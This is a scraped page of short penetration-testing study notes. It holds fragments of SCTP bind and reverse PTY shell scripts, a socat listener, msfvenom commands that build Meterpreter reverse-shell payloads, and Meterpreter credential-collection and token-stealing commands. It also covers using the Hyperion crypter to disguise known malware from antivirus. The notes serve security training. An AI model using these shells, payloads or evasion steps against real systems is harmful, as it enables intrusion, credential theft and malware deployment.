Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: unknowndevice64 2019-05-18 13:27:31

#!/usr/bin/env python2
import termios
import select
import socket
import os
import fcntl
import argparse
from sctp import *

class PTY:
    def __init__(self, slave=0, pid=os.getpid()):
        # apparently python GC's modules before class instances so, here
        # we have some hax to ensure we can restore the terminal state.

Score: 0

By: unknowndevice64 2019-05-18 13:27:35

Python Bind SCTP PTY Shell - testing version
infodox - (2013)
Binds a PTY to an SCTP port on the host it is run on.
Use the script to connect.
import os
import pty
import socket
from sctp import *

lport = 31337 # XXX: CHANGEME

def main()...

Score: 0

By: unknowndevice64 2019-05-18 13:27:38

Reverse Connect SCTP PTY Shell - testing version
infodox - (2013)
For an excellent listener use the following socat command:
socat file:`tty`,echo=0,raw sctp-listen:PORT
Alternatively, use
import os
import pty
import socket
from sctp import...

Score: 0

List payloads

msfvenom -l



msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf


msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe



Score: 0

Information Gathering
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

Escalating Privs
ps then migrate

Tokens (use incognito)
list_tokens -u
steal_token ...

Score: 0

There are many pages on the web documenting quick reverse shell one liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...

Score: 0

By: unknowndevice64 2019-05-18 12:26:48

Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
The Domain
Offensive Security Labs

Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting

The Essential Tools

Score: 0

Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...

Score: 0

See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
Translate them for use on OSCP LAB or EXAM.


Metasploit requires PostgreSQL

systemctl start postgresql

To enabl...

Score: 1

Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communicatio...

Score: 0